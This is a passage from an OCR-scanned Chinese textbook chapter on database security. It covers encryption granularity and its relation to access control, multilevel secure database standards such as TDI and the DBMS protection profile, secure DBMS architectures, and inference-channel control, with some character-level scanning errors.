该 方式 的 系统 安全 性 与 灵活 性 很 高 ， 但 实现 技术 相对 复杂 。 在 该 方式 中 ， 每 个 数据 项 可 
以 独立 地 进行 加 解密 操作 ， 并 可 以 使 用 不 同 的 数据 项 密 钥 。 这 样 ， 当 对 某 一 个 数据 项 进 
行 访问 的 时 候 ， 就 只 需要 对 指定 的 数据 项 进行 解密 ， 而 不 需要 将 整个 数据 表 或 记录 解密 
后 再 处 理 ， 因 此 查询 效率 相对 于 数据 表 加 密 更 高 ; 同时 , 不 同 的 数据 项 使 用 不 同 的 密 钥 ， 
相同 的 明文 不 会 形成 相同 的 密 文 ， 这 样 大 大 提高 了 数据 库 加密 系 统 的 抗 密码 分 析 能 力 。 

以 记录 为 单位 的 加 密 介 平 与 前 两 者 之 间 。 将 记录 作为 操作 对 象 , 统一 进行 加 /解密 处 
理 。 这 种 加 密 粒 度 的 特点 是 使 用 较为 方便 。 但 是 对 于 使 用 不 够 灵活 ， 当 需要 对 某 个 数据 
项 进行 操作 时 , 需要 对 以 记录 的 字段 数据 为 单位 的 数据 进行 完全 加 /解密 才能 进行 数据 库 
的 操作 。 
4.3.4.4 ”数据 库 加 密 技 术 与 数据 库 访 问 控制 技术 的 关系 

数据 库 加 密 技术 通过 密码 有 效 合 理 的 密码 算法 运用 与 密 钥 管理 ， 对 计算 机 系统 外 存 
储 器 中 数据 提供 了 一 种 有 效 的 保护 手段 。 通 过 数据 加 密 ， 可 以 对 数据 库 的 关键 数据 进行 
保护 ， 保 证 关键 数据 即使 被 泄露 或 者 丢失 ， 也 难以 被 人 破译 ， 因 此 可 以 大 大 提高 关键 数 
据 的 安全 性 。 
同时 ， 可 以 依据 数据 库 的 使 用 者 的 使 用 权限 、 数 据 库 中 数据 的 物理 存储 与 迎 辑 关系 
对 数据 库 的 密 钥 机 制 进行 分 配 管理 ， 从 而 使 得 对 于 数据 库 内 容 不 需要 了 解 的 数据 库 管理 
员 不 能 获取 数据 的 明文 信息 。 这 样 也 防范 了 攻击 者 滥用 数据 库 管 理 员 权限 ， 窃 取 用 户 数 
据 的 可 能 ， 从 而 提高 用 户 数据 的 安全 性 。 

相 比 而 言 ， 访 问 控制 技术 在 数据 库 中 提供 了 一 种 控制 用 户 访问 数据 的 机 制 ， 它 通过 
创建 用 户 、 授 予 用 户 相 应 权限 来 实施 这 种 控制 ， 规 定 只 有 具有 相应 权限 的 用 户 才 能 对 数 
据 进行 相应 的 操作 的 可 能 性 。 

尽管 数据 库 加 密 技术 ， 相 比 访问 控制 技术 具有 较 强 的 数学 理论 基础 ， 同 时 能 够 弥补 
访问 控制 技术 的 一 些 不 足 ， 但 是 数据 库 加 密 技术 尚 不 能 完全 取代 数据 库 访问 控制 技术 ， 
替代 其 他 安全 机 制 独立 地 对 数据 库 提 供 安 全 服务 。 

这 主要 由 于 加 密 技术 对 系统 性 能 的 影响 较 大 ， 加 密 技术 是 通过 复杂 的 数学 运算 来 实 
现 某 些 安全 目标 ， 因 此 必然 需要 牺牲 系统 的 计算 资源 与 存储 资源 。 尽 管 通过 用 户 拥有 解 
密 的 密码 ， 来 表征 用 户 对 系统 访问 控制 的 权限 ， 能 够 实现 访问 控制 机 制 ， 但 当 对 数据 库 
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中 的 数据 采用 加 密 的 方法 来 完成 访问 控制 的 功能 时 ,拥有 密 钥 的 用 户 在 访问 加 密 数 据 时 
需要 对 数据 逐一 解密 ， 然 后 对 明文 数据 进行 操作 ， 若 数据 需要 更 新 写 回 数据 库 ， 那 么 就 
需要 对 新 数据 重新 进行 加 密 。 这 个 操作 代价 往往 是 比较 大 的 ， 这 就 极 大 地 影响 系统 的 
性 能 。 

同时 ， 加 密 技 术 在 灵活 性 上 相 比 于 访问 控制 较 欠 缺 。 访 问 控制 技术 可 以 灵活 地 实现 
对 数据 库 中 各 种 粒度 的 对 象 〈 包 括 表 ， 记 录 ， 字 段 值 等 ) 进行 分 别 授权 。 如 果 采 用 加 密 
方法 ， 当 需要 对 多 粒度 进行 授权 ， 就 需要 涉及 大 量 的 密 钥 管理 与 密码 学 运算 ， 这 会 造成 
系统 管理 的 复杂 度 急剧 上 升 。 

而 且 ， 对 于 加 密 技 术 ， 密 钥 管理 往往 采取 的 是 多 层次 密 钥 树 结构 ， 子 密 钥 受 父 密 钥 
保护 ， 通 常 是 子 密 钥 被 父 密 钥 加 密 存储 。 从 保护 密 钥 的 机 密 性 角度 ， 居 于 密 钥 树 项 部 的 
根 密 钥 存储 、 访 问 与 使 用 应 受到 相当 的 保护 约束 ， 但 是 这 种 逐 级 加 密 的 形式 会 造成 根 密 
钥 只 能 以 明文 形式 存在 。 因 此 根 密 钥 的 安全 需要 依赖 于 其 他 安全 机 制 ， 包 括 物 理 安全 、 
访问 控制 安全 与 管理 安全 来 保护 。 

加 密 技 术 和 访问 控制 技术 是 两 种 不 同 的 安全 措施 ， 可 以 这 么 说 ， 如 果 访 问 控制 是 保 
护 数据 库 的 第 一 道 防线 ， 那 么 加 密 技 术 就 是 进一步 保护 数据 库 的 第 二 道 防 线 ， 有 了 加 密 
技术 的 保护 ， 数 据 库 更 加 安全 。 


4.3.5 多 级 安全 数据 库 


多 级 安全 数据 库 是 数据 库 在 具体 设计 、 实 现 方面 重要 的 研究 领域 。 它 将 数据 库 中 的 
重要 数据 进行 安全 等 级 划分 ， 通 过 融合 访问 控制 、 数 据 库 加 密 等 技术 实施 的 综合 保障 技 
术 来 实现 符合 标准 规范 的 安全 数据 库 。 

43.5.1 ”安全 数据 库 标准 

目前 ， 关 于 安全 数据 库 ， 一 些 国家 和 机 构 制 定 了 相应 的 评价 规范 与 标准 ， 以 此 来 规 
范 并 指导 安全 数据 库 的 设计 、 实 现 可 实用 化 的 安全 数据 库 。 

1. 可 信 数 据 库 管 理 系统 解释 

可 信 数 据 库 管理 系统 解释 (Trusted Database Management System Interpretation of the 
Trusted Computer Evaluation Criteria, TDI) 是 美国 国防 部 、 美 国 国家 计算 机 安全 中 心 ， 
在 提出 “桂皮 书 ”TCSEC (Trusted Computer System Evaluation Criteria) 之 后 ， 为 了 将 
TCSEC 应 用 与 数据 库 管 理 系统 环境 ， 而 于 1991 年 4 月 颁布 的 一 部 针对 数据 库 管理 系统 
安全 性 要 求 的 标准 。 

TDI 作为 可 信 计 算 机 系统 标准 在 数据 库 管理 系统 方面 的 解释 ， 将 可 信 计 算 系统 的 评 
估 标 准 由 操作 系统 扩展 到 了 数据 库 管理 系统 以 及 应 用 软件 系统 。 它 在 20 世纪 90 年 代 中 
期 之 前 ， 作 为 可 信 产 品 的 重要 评估 标准 ， 在 美国 的 安全 数据 库 发 展 方面 提供 了 有 力 的 评 
定 基础 ， 在 当时 是 国际 数据 库 学 术 界 和 数据 库 管理 系统 厂商 最 为 认可 的 标准 之 一 。 

作为 一 部 数据 库 安 全 的 评估 标准 , 它 能 够 指导 开发 者 在 开发 数据 库 DBMS 的 产品 过 
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程 中 添加 安全 特性 ， 使 得 DBMS 产品 能 够 提供 符合 规范 的 安全 功能 ， 即 符合 TCSEC 要 
求 的 安全 功能 。 同 时 TDI 在 借鉴 TCSEC 的 等 级 安全 思想 ， 提 出 了 一 种 度量 评估 具有 等 
级 安全 特性 的 多 级 安全 数据 库 系统 的 评估 方法 ,为 具体 的 产品 安全 特性 评价 给 出 了 依据 。 

从 组 成 上 ，TDI 由 技术 背景 、 需 求解 释 、 附 录 A 与 附录 B 四 部 分 组 成 。 

其 中 技术 背景 描述 了 如 何 由 一 个 多 个 可 信 部 件 或 可 信 的 产品 构造 一 个 可 信 系 统 的 
问题 。 依 据 TCSEC 的 基本 概念 可 信 计 算 基 (Trusted Computing Base, TCB) 的 概念 ， 
扩展 性 地 提出 了 TCB FR (TCB subsets) 的 概念 ， 使 得 引用 验证 机 制 可 以 推广 到 可 信 
应 用 ,可 以 基于 已 得 到 评估 的 安全 产品 来 评估 由 这 些 安全 产品 组 成 的 新 的 安全 产品 系统 ， 
从 而 可 以 大 大 提高 评估 效率 。 

在 需求 解释 部 分 ， 规范 对 如 何 依据 TCSEC 的 安全 要 求 来 对 由 TCB 子 集 构成 的 系统 
进行 评估 做 出 了 解释 。 

附录 A 描述 了 如 何 依据 TCSEC 对 DBMS 进行 详细 的 分 级 ,以 及 各 级 别 应 该 满足 的 
安全 功能 ， 该 部 分 是 数据 库 安全 评估 最 直接 的 参考 资料 之 一 。 

附录 B 描述 了 TDI 颁布 时 ， 数 据 库 安全 领域 仍 处 于 研究 的 一 些 技术 问题 ， 包 括 : 预 
期 保障 问题 、 折 衷 选择 问题 、 评 估 变 更 问题 、RVM 满足 问题 、 子 集 依赖 问题 、 防 自 改 问 
题 、 局 部 与 全 局 要 求 的 原理 、 内 容 和 环境 相关 的 访问 控制 问题 、 数 据 库 的 批量 载 入 问题 、 
系统 评估 的 局 部 分 析 问 题 和 复杂 系统 的 分 级 问题 。 

从 内 容 上 ，TDI 标准 内 容 包括 五 个 主题 ， 即 系统 集成 、 可 分 评估 、 子 集约 束 、 局 域 
划分 与 应 用 解释 。 

对 于 一 个 现 有 的 系统 而 言 ， 它 往往 包含 了 许多 类 型 的 产品 来 实现 系统 复杂 的 功能 需 

求 。 如 操作 系统 产品 、 数 据 库 管理 系统 产品 、 网 络 产品 等 。 系 统 集成 主题 主要 针对 这 种 
需求 ， 探 讨 了 如 何 继 承 计算 机 产品 、 系 统 和 网 络 并 保障 集成 系统 的 安全 性 。 该 主题 将 系 
统 的 构成 划分 为 分 部 和 分 层 两 种 结构 。 分 部 结构 主要 由 一 些 对 等 的 实体 部 分 通过 互相 协 
作 的 形式 构成 起 来 。 系 统 的 安全 功能 和 安全 策略 在 各 部 分 分 步 实施 ， 通 过 通信 机 制 相 互 
协调 ， 实 现 互 操 作 特性 。 而 分 层 结构 指 的 是 按照 依赖 关系 ， 将 系统 划分 为 多 个 有 序 的 层 
次 结构 ， 高 层 部 分 依赖 低层 部 分 ， 底 层 部 分 的 安全 服务 决定 了 高 层 部 分 的 安全 服务 的 正 
确 、 可 靠 。 
可 分 评估 主题 探讨 的 是 如 何 通过 对 系统 集成 中 各 分 层 、 分 部 分 产品 的 安全 评估 为 基 
础 ， 来 评估 整个 系统 的 安全 特性 。 这 就 是 TDI 中 提出 的 TCB 子 集 的 概念 。TCB 子 集 来 
自分 部 分 评估 的 思想 。 一 个 TCB 子 集 是 一 些 软 硬件 的 集合 , 如 果 依 据 一 定 的 访问 控制 策 
略 ， 可 以 实现 对 主体 和 客体 的 所 有 访问 进行 仲裁 ，TCB 子 集 是 防 自 改 、 抗 干扰 的 ;，TCB 
子 集 是 足够 小 ， 足 够 简单 ， 易 于 分 析 的 ， 那 么 TCB 子 集 可 以 对 所 属 部 分 实现 可 分 评估 。 
这 也 就 是 所 谓 RVM 机 制 的 主要 技术 特征 。 如 果 被 评估 系统 的 各 部 分 满足 RVM， 那 么 评 
估 系 统 的 TCB 就 可 以 划分 为 多 个 不 同 的 TCB 子 集 , 并 且 各 TCB 子 集 应 遵从 各 自 访问 策 
略 满足 RVM 特征 。 这 样 就 能 通过 对 各 部 分 评估 来 实现 对 系统 的 整体 评估 。 
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子 集约 束 主题 主要 探讨 当 TCB 子 集 满 足 怎样 的 条 件 时 候 才 能 进行 有 效 地 可 分 评估 。 
对 于 DBMS 设计 者 ， 如 果 各 TCB 满足 子 集约 束 条 件 ， 那 么 就 能 够 进行 简化 地 评估 。 子 
集约 束 条 件 主要 包括 : 

® TCB 子 集 必须 被 清晰 地 标识 ， 即 TCB 子 集 应 明确 包括 哪些 主体 、 哪 些 客体 ， 
任何 一 个 客体 应 该 只 属于 一 个 TCB TE: 系统 策略 可 分 ， 可 将 系统 策略 赋予 候选 TCB 
子 集 ; 

@ 所 有 子 集 可 信和 主体 必须 控制 在 所 属 TCB 子 集 合 内 部 ; 

@ 每 一 个 TCB 子 集结 构 和 体系 需要 被 清晰 地 描述 ; 

@ 每 个 TCB 子 集 必须 占用 独立 、 不 同 的 子 集 空间 ， 修 改 系 统 中 的 某 个 子 集 空间 只 
影响 其 对 应 TCB 子 集 及 其 更 底层 的 TCB TE; 

© 每 个 下 层 的 TCB 子 集 都 为 其 上 层 的 TCB 子 集 提供 RVM 机 制 支持 。 

对 于 一 个 系统 被 视 为 一 个 TCB 的 实体 , 那么 就 不 需要 考虑 任何 内 部 结构 , 直接 可 以 
依据 TDI 进行 评估 。 如 果 一 个 系统 TCB 由 许多 TCB 子 集 组 成 形成 子 集 化 的 体系 结构 ， 
TDI 也 可 适用 。 但 车 一 个 系统 只 有 某 些 部 分 满足 部 分 评估 的 六 个 条 件 ， 那 么 该 系统 无 法 
用 TDI 进行 有 效 评估 。 

局 域 划分 主题 主要 探讨 为 了 实现 重用 评估 结果 和 可 分 评估 ， 需 要 系统 应 满足 的 要 
求 ， 包 括 全 局 要 求 和 局 部 要 求 。 在 一 个 集成 或 合成 的 系统 中 ， 全 局 要 求 必须 被 每 个 TCB 
子 集 所 满足 ， 同 时 也 要 被 系统 作为 一 个 整体 所 满足 。 局 部 要 求 是 那些 仅 需 被 TCB 子 集 独 
立 满足 的 要 求 。 对 于 已 评估 过 的 TCB 子 集 ， 不 再 需要 对 其 局 部 要 求 作 重新 评估 。 但 是 ， 
对 于 全 局 要 求 , 即使 先前 的 TCB 子 集 评 估 中 得 到 了 满足 , 在 现 评估 系统 中 也 需要 进行 重 
新 的 检查 和 评价 。 

应 用 解释 主题 主要 列举 了 TCI 应 用 于 TCB 子 集 的 一 些 情形 ， 给 出 了 应 用 中 的 详细 
解释 和 参考 。 

2. 数据 库 管理 系统 保护 轮廓 

1991 年 ， 美国 等 宣布 了 制定 通用 安全 评估 准则 (Common Criteria for IT security 
Evaluation, 简称 CC) 的 计划 。 并 于 1996 年 发 布 了 CC1.0 版 , 国际 性 标准 化 组 织 ISO/IEC 
对 信息 安全 评估 领域 也 一 直 尽 心 国际 化 标准 的 努力 ， 他 们 于 1999 年 将 CC2.1 版 本 确立 
为 国际 标准 ， 即 ISO/IEC 15408-1999。 相 应 的 数据 库 的 安全 标准 也 从 TCSEC 向 CC 评估 
过 渡 。 实施 CC 评估 的 重点 就 是 开发 各 类 产品 和 系统 的 保护 轮廓 (Protection Profile, PP). 

著名 国际 数据 库 公 司 Oracle H CC 标准 发 布 以 后 ,就 积极 地 参与 制定 DBMS 的 PP, 
并 于 1998 年 分 别 发 表 了 政府 数据 库 管理 系统 保护 轮廓 GDBMS.PP 和 商用 数据 库 管理 系 
统 保护 轮廓 CDBMS.PP， 这 两 个 保护 轮廓 先后 通过 了 NIAP 的 PP 评估 ， 成 为 经 过 正式 
登记 注册 的 保护 轮廓 。2000 年 3 月 ，Oracle 公司 推出 了 通用 数据 库 管理 系统 的 2.1 版 本 
的 保护 轮廓 DBMS.PP. 

DBMS.PP 依照 CC2.1 的 规范 ， 其 内 容 上 包括 PP 引言 、TOE 描述 、TOE 安全 环境 、 
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安全 目标 、 安 全 要 求 、 PP 应 用 注释 以 及 基本 原理 。 DBMS.PP 中 目标 评估 保证 级 是 EAL3， 
提供 了 数据 库 管理 系统 DBMS 的 安全 要 求 集 ， 兼 容 三 种 认证 模式 : OS 认证 模式 、 数 据 
库 认 证 模式 、OS 和 数据 库 认 证 混合 模式 。 

在 安全 环境 部 分 ， 该 PP 确定 了 其 定义 的 DBMS 所 需 面 对 的 威胁 ， 需 要 制定 的 安全 
策略 ， 以 及 所 需 基 本 的 假设 。 

DBMS. PP 明确 了 三 种 数据 库 资产 : 数据 库 客体 、 控 制 数据 和 审计 数据 ， 这 就 是 需 
要 保护 的 对 象 ， 必 须 保 证 这 些 信息 资产 的 机 密 性 、 完 整 性 或 可 用 性 不 被 侵害 。 针 对 这 些 
资产 的 威胁 分 析 ， 下 面 列 出 该 PP 所 考虑 DBMS 系统 应 面 对 的 威胁 。 

T. ACCESS: 对 数据 库 的 非 授权 访问 。 

T.DATA: 对 信息 的 非 授 权 访 问 。 

T.RESOURCE: 资源 的 过 度 使 用 。 

T. ATTACK: 未 检测 出 的 攻击 。 

T. ABUSE. USER: 特权 误 用 。 

TOPERATE: 不 安全 的 操作 。 

TCRASH: 意外 中 断 ， 软 、 硬 件 、 电 源 、 存 储 介 质 故 障 。 

T. PHYSICAL: 物理 攻击 。 

为 了 应 对 以 上 的 攻击 ，DBMS 应 包含 以 下 安全 策略 : 

@ P ACCESS: 控制 对 数据 库 资源 的 访问 ， 包 括 使 用 自主 访问 控制 策略 进行 自主 访 
问 控制 ， 并 且 要 控制 资源 的 分 配 。 

@ P ACCOUNT: 对 数据 库 用 户 进行 安全 审计 ,包括 对 数据 库 客体 操作 和 管理 员 行 
为 等 进行 审计 。 

通过 以 上 的 安全 环境 定义 ，DBMS.PP 中 定义 了 在 以 上 安全 威胁 下 要 实现 的 安全 日 
标 ， 涉 及 访问 控制 、 资 源 使 用 、 鉴 别 认 证 、 安 全 审计 、 系 统 结构 、 生 命 周 期 保证 等 方面 ， 
共 17 个 , 分 别 为 O.ACCESS、O.RESOURCE、 OI&A.TOE、O.AUDIT、O.ADMIN.TOE、 
O.ADMIN.ENV 、 OFILES、OI&AENV、O.SEP、O.INSTALL 、OPHYSICAL 、 
O.AUDITLOG, O.RECOVERY, O.QUOTA, O.TRUST, O.AUDITDATA, O.MEDIA. 
通过 安全 目标 ， 能 得 到 DBMS 系统 所 需 满足 的 评估 要 求 。 

同时 在 安全 要 求 方面 ，DBMS.PP 定义 了 七 类 包括 : 安全 审计 类 、 用 户 数据 保护 类 、 
标识 与 认证 类 、 安 全 管理 类 、 安 全 功能 保护 类 、 资 源 使 用 类 和 TOE 访问 类 。 

3. 我 国 数据 库 管理 系统 安全 评估 准则 

我 国 的 数据 库 安全 评估 准则 于 2001 年 首次 提出 ， 即 “军用 数据 库 安全 评估 准则 ”。 
我 国 公安 部 为 推行 “等 级 保护 计算 机 系统 ”， 于 2002 年 发 布 了 公安 部 行业 标准 : 
GA/T389-2002 计算 机 信息 系统 安全 等 级 保护 数据 库 管理 系统 技术 要 求 。2005 年 ， 全 国 
信息 安全 标准 技术 委员 会 发 布 了 GB/T20009-2005,“ 信 息 安 全 技术 数据 库 管 理 系统 安全 
评估 准则 ” 这 是 目前 我 国 与 数据 库 安 全 直接 相关 的 三 个 标准 。 
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43.5.2 ”多 级 安全 数据 库 的 体系 结构 

依据 安全 数据 库 的 标准 与 安全 数据 库 所 要 达到 的 安全 等 级 目标 ， 数 据 库 管 理 系统 的 
体系 结构 上 要 满足 相应 的 安全 功能 与 保障 要 求 ， 达 到 相应 的 数据 库 管 理 系统 产品 安全 需 
求 规范 。 

一 般 而 言 ， 数 据 库 管 理 系统 的 体系 结构 可 分 为 三 类 : 可 信 主 体 结构 、TCB 子 集结 构 
与 完整 性 锁 结构 。 

1. 可 信和 主体 结构 

可 信 主 体 结构 是 一 种 单一 的 DBMS 体系 结构 ， 参 见 图 4-7。 其 管理 的 数据 按照 等 级 
安全 进行 划分 ， 其 数据 库 管 理 系统 具有 完整 的 TCB， 可 以 独立 于 底层 操作 系统 实施 访问 
控制 策略 。 其 体系 结构 如 图 4-7 所 示 。 

可 信 主 体 结构 中 , 数据 均 具有 安全 等 级 标记 , DBMS 作为 可 信 主 体 , 依据 安全 策略 ， 
对 数据 按照 其 标记 属性 来 实施 管理 ， 实 现 系 统 的 强制 访问 控制 与 自主 访问 控制 。 高 安全 
等 级 的 用 户 可 以 通过 多 安全 等 级 DBMS 读 写 高 安全 等 级 的 数据 , 低 安全 等 级 的 用 户 可 以 
通过 多 安全 等 级 DBMS 读 写 低 安全 等 级 的 数据 。 并 且 高 安全 等 级 的 用 户 只 能 通过 多 安全 
等 级 DBMS 读 而 不 可 以 写 低 安全 等 级 的 数据 , 而 低 安全 等 级 的 用 户 是 不 可 以 读 写 高 安全 
等 级 的 数据 。 

尽管 可 信和 主体 结构 能 够 提供 不 依赖 操作 系统 TCB 的 安全 数据 库 体 系 , 但 由 于 DBMS 
TCB 需要 实现 多 粒度 、 灵 活 的 访问 控制 ， 因 此 会 造成 安全 内 核 设 计 负 责 的 问题 ， 这 就 不 
符合 TDI 对 于 数据 库 TCB 的 简单 小 巧 易于 验证 的 要 求 。 


低 等 级 用 户 


多 安全 等 级 数据 库 管理 系统 
可 信 操 作 系 统 


高 等 级 用 户 


图 4-7 可 信和 主体 体系 结构 图 


2. TCB 子 集 类 体系 结构 
TCB 子 集 类 体系 结构 ,是 基于 TDI 中 TCB 子 集 的 思想 , 依赖 DBMS 外 提供 的 TCB 
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来 实现 对 数据 库 进 行 多 级 安全 保护 。 通常 , 提供 TCB 的 系统 包括 可 信 操 作 系统 与 可 信 网 
络 等 底层 软件 ，DBMS 居于 底层 可 信 系 统 软 件 之 上 ， 提 供 安 全 服务 。 

区 别 于 可 信 主 体 体 系 结构 ， 在 这 一 类 结构 系统 中 ， 系 统 运行 中 存在 多 个 具有 不 同安 
全 等 级 的 DBMS 实例 ,它们 分 别 为 相应 等 级 的 用 户 提供 安全 访问 结构 ， 同 时 对 数据 库 进 
行 相应 的 管理 。 该 类 结构 具有 3 个 特点 : 

@ 多 级 数据 库 管理 系统 中 同时 存在 的 多 个 级 别 的 DBMS 实例 构成 。 

@ 多 级 数据 库 及 其 数据 被 分 解 成 不 同等 级 的 对 象 保存 在 操作 系统 对 象 中 。 

© 多 级 数据 库 管理 系统 有 一 定 的 访问 控制 权 ， 但 操作 系统 对 于 数据 库 管理 系统 访 
问 数据 的 操作 实行 完全 访问 控制 。 

按照 DBMS 的 分 布 方式 ，TCB 子 集 类 体系 结构 可 以 分 为 集中 式 体 系 结构 和 分 布 式 
体系 结构 。 

集中 式 体系 结构 如 图 4-8 所 示 。 其 主要 特点 是 可 信 操 作 系统 完成 多 等 级 DBMS 的 强 
制 隔离 和 强制 访问 控制 ， 同 时 数据 可 以 集中 存储 。 数 据 库 数据 按照 安全 等 级 进行 分 解 ， 
作为 操作 系统 的 对 象 集中 保存 在 可 信 操 作 系统 中 。 高 安全 等 级 的 用 户 可 以 通过 高 安全 等 
级 DBMS 读 写 高 安全 等 级 的 数据 ， 低 安全 等 级 的 用 户 可 以 通过 低 等 级 DBMS 读 写 低 安 
全 等 级 的 数据 。 并 且 高 安全 等 级 的 用 户 通过 高 安全 等 级 DBMS 可 以 读 取 低 安全 等 级 的 数 
据 。 这 样 可 以 实现 较 高 的 安全 等 级 信息 系统 ， 同 时 可 靠 性 较 高 ,减少 了 TCB 的 大 小 和 复 
杂 性 。 但 这 一 体系 会 造成 操作 系统 较 大 的 负载 ， 不 适宜 并 发 运行 包含 大 量 安全 等 级 的 应 
用 ， 同 时 安全 等 级 的 DBMS 对 数据 的 共享 可 能 形成 隐 通 道 。 


低 等 级 用 户 
高 等 级 低 等 级 
DBMS 实例 DBMS 实例 


可 信 操 作 系 统 


图 4-8 集中 式 TCB 子 集 类 体系 结构 图 
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分 布 式 体系 结构 如 图 4-9 所 示 。 其 主要 特点 是 多 级 数据 库 通过 完全 数据 复制 或 者 可 
变数 据 复制 形式 被 分 为 多 个 数据 片段 。 由 一 个 可 信和 前 端 处 理 器 为 不 同等 级 的 用 户 访问 相 
应 的 等 级 数据 库 DBMS。 每 个 等 级 数据 库 DBMS 管理 相应 等 级 的 数据 。 相 比 于 集中 式 
TCB 子 集 类 体系 结构 ， 分 布 式 TCB 子 集 类 体系 结构 具有 数据 分 布 式 存储 的 特点 ， 通 过 
数据 存储 站 点 的 安全 等 级 来 分 别 存储 不 同等 级 的 数据 ， 低 级 数据 库 中 的 内 容 可 以 被 复制 
到 高 安全 等 级 的 数据 库 中 受 其 支配 。 同 时 每 个 站 点 的 DBMS 只 为 该 级 别 用 户 服务 , 不 同 


级 别 用 户 所 连接 访问 的 数据 库 是 不 同 的 。 


图 4-9 分 布 式 TCB 子 集 类 体系 结构 图 


3. 完整 性 锁 结构 

完整 性 锁 结构 (Integrity Lock) 又 称 为 Spray Paint 体系 ， 它 是 可 信和 主体 结构 的 一 种 
变种 。 如 图 4-10 所 示 ， 该 结构 中 用 户 通过 非 可 信和 前 端 处 理 部 件 来 执行 数据 访问 过 程 ， 同 
时 DBMS 也 是 非 可 信 的 。 体 系 的 安全 可 信 依 赖 于 居于 非 可 信和 前 端 与 非 可 信 DBMS 之 间 
的 可 信 操 作 系统 和 可 信 过 滤 层 。 它 们 作为 系统 的 TCB 实现 系统 所 需 的 安全 功能 和 多 安全 
等 级 的 保护 。 可 信 过 滤器 负责 对 数据 提供 多 级 保护 ， 通 过 对 每 一 个 数据 库 数 据 对 象 附加 
安全 戳 来 标记 其 所 属 安全 域 ， 并 产生 一 个 完整 性 校 验 和 ， 然 后 将 数据 封装 后 反馈 给 相应 
用 户 ， 只 有 具有 相应 安全 标记 的 用 户 才能 访问 这 些 数据 ， 从 而 实现 不 同安 全 等 级 用 户 对 
不 同等 级 数据 的 访问 。 

该 体系 结构 的 优点 是 不 需 对 数据 库 管 理 系统 进行 任何 改动 ， 实 现 相 对 简单 ， 同 时 通 
过 完整 性 锁 机 制 可 以 有 效 验 证 数据 与 安全 标签 的 完整 性 。 但 其 缺点 在 于 安全 性 较 差 ， 整 
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体 安 全 依赖 于 可 信 操 作 系统 与 可 信 过 滤器 ， 可 信 过 滤器 也 只 能 检查 验证 数据 安全 ， 不 能 
阻 断 数据 自 改 行为 。 


可 信 操 作 系统 


图 4-10 完整 性 锁 体系 结构 图 


4.3.6 ”数据库 的 推理 控制 问题 


在 数据 库 中 ， 由 于 数据 之 间 存 在 着 各 种 内 在 关联 关系 ， 因 此 数据 库 用 户 可 能 根据 被 
允许 访问 的 信息 ， 利 用 数据 之 间 的 内 在 逻辑 联系 ， 推 导出 某 些 该 用 户 无 法 访问 到 的 数据 
库 信息 。 这 类 问题 称 为 数据 库 中 的 推理 分 析 问 题 。 

数据 库 安全 中 的 推理 分 析 问 题 ， 其 本 质 是 用 户 根据 合法 的 低 安 全 等 级 的 数据 和 模式 
的 约束 推导 出 高 安全 等 级 的 数据 ， 造 成 未 经 授权 的 信息 泄漏 。 这 种 推理 的 路 径 称 为 推理 
通道 (Inference Channel)。 近 年 来 随 着 外 包 数 据 库 模 式 及 数据 挖掘 技术 的 发 展 ， 对 数据 
库 推 理 控制 的 需求 越 来 越 高 ， 并 发 展 出 隐私 保护 这 类 应 用 问题 。 

推理 通道 通常 分 为 三 大 类 : 

1. 演绎 推理 通道 (Deductive Channel). 

在 这 类 推理 通道 中 ， 高 级 数据 可 以 完全 从 低级 数据 中 形式 化 的 推理 得 出 。 
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2. 不 明 推 理 通道 (Abductive Channel). 

这 类 推理 通道 中 ， 如 果 确 定 一 些 低 级 别 上 的 推理 依据 公理 ， 由 低级 数据 就 可 以 推理 
出 高 级 数据 ， 完 成 演绎 推理 及 其 证 明 这 类 推理 通道 相 比 于 演绎 推理 通道 ， 需 要 一 些 推理 
假设 ， 因 此 其 完备 性 相对 较 弱 。 

3. 概率 推理 通道 (Probabilistic Channel). 

在 这 类 推理 通道 中 ， 由 低 等 级 数据 可 以 降低 高 等 级 数据 的 不 确定 性 ， 但 不 能 完全 确 
定 出 高 等 级 数据 的 内 容 。 

对 于 数据 库 系 统 而 言 ， 产 生 推 理 通 道 的 原因 包括 : 

1. 函数 依赖 与 多 值 依赖 

关系 数据 模型 中 ， 各 属性 之 间 存 在 着 函数 依赖 与 多 指 依赖 关系 。 利 用 不 同 级 别 数据 
之 间 的 “函数 依赖 ”和 “多 值 依赖 ”进行 推理 分 析 ， 就 可 形成 推理 通道 。 解 决 这 类 推理 
通道 的 方法 是 提升 某 些 数据 的 安全 等 级 ， 确 保 属性 的 安全 等 级 和 与 它 相 关 的 函数 依赖 和 
多 值 依 赖 一 致 性 。 

2. 取 值 约束 

利用 取 值 约束 特性 ， 当 所 涉及 的 数据 库 利 用 查询 结果 之 间 的 逻辑 联系 进行 综合 分 
析 ， 就 能 推断 出 高 级 数据 信息 ， 形 成 推理 通道 。 解 决 这 类 通道 的 方法 是 尽量 减少 数据 之 
间 的 取 值 约束 ， 在 相应 安全 等 级 上 定义 类 似 的 约束 ， 并 将 约束 进行 分 解 。 

3. 实体 完整 性 约束 

实体 完整 性 约束 主要 由 于 主 码 造 成 。 由 于 数据 库 中 要 求 每 个 元 组 中 具有 一 个 非 空 且 
唯一 的 主 码 。 因 此 ， 当 记录 中 高 等 级 用 户 已 经 建立 了 一 个 元 组 ， 若 低 等 级 用 户 要 插入 一 
个 与 主 码 相同 的 元 组 ， 就 会 造成 插入 失败 的 错误 ， 这 样 就 形成 了 一 种 推理 通道 。 这 种 推 
理 通道 可 以 通过 允许 不 同安 全 等 级 的 元 组 同时 存在 ， 即 多 实例 化 来 解决 。 

4. 分 级 约束 

一 个 分 级 约束 是 一 个 描述 对 数据 进行 分 级 的 规则 。 如 果 这 些 分 级 标准 被 非 授 权 用 户 
获知 ， 那 么 用 户 有 可 能 从 这 些 约束 自身 推导 出 敏感 数据 。 解 决 此 类 推理 通道 的 方法 是 确 
保 分 级 约束 规则 不 被 泄露 ， 一 旦 约束 规则 被 泄露 ， 保 证 安全 的 方法 就 是 拒绝 处 理 任何 与 
敏感 数据 相关 的 查询 请 求 。 

5. 组 合 查询 推理 

利用 查询 结果 之 间 的 逻辑 联系 进行 推理 。 用 户 一 般 先 向 数据 库 发 出 多 个 查询 请 求 ， 
这 些 查 询 大 多 包含 一 些 聚集 类 型 的 函数 (如 合计 、 平 均值 等 ), 然后 利用 返回 的 查询 结果 ， 
在 综合 分 析 的 基础 上 ， 推 断 出 高 级 数据 信息 。 消 除 这 类 通道 的 方法 是 ， 修 改 用 户 查询 使 
之 仅 涉及 用 户 被 许可 的 授权 数据 ， 或 反馈 具有 标识 的 查询 结果 ， 这 一 结果 数据 的 安全 等 
